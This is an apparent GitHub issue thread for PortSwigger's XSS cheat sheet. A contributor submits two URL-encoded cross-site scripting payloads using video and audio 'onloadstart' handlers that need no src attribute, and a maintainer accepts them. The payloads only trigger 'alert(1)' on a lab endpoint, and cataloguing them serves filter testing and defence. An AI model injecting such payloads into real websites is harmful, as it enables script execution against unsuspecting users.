### ISSUE TITLE
Better onloadstart payload for newer firefox versions and other browsers

### ISSUE THREAD

**Issue by hansmach1ne** [PortSwigger/xss-cheatsheet-data#53]
`https://portswigger-labs.net/xss/xss.php?x=%3Cvideo%20controls%20onloadstart=%22alert(1)%22%3E%20%3Csource%20type=%22video/mp4%22%3E%20%3C/video%3E&context=html`

`https://portswigger-labs.net/xss/xss.php?x=%3Caudio%20controls%20onloadstart=%22alert(1)%22%3E%20%3Csource%20type=%22video/mp4%22%3E%20%3C/audio%3E&context=html`

- Doesn't require src attribute
- Works in newer firefox versions, chrome,..

**Comment by hackvertor** [comment]
This is a good spot I'll update the cheat sheet to remove src

**Comment by hackvertor** [comment]
Thanks for the submission! This will be included on the cheat sheet shortly.
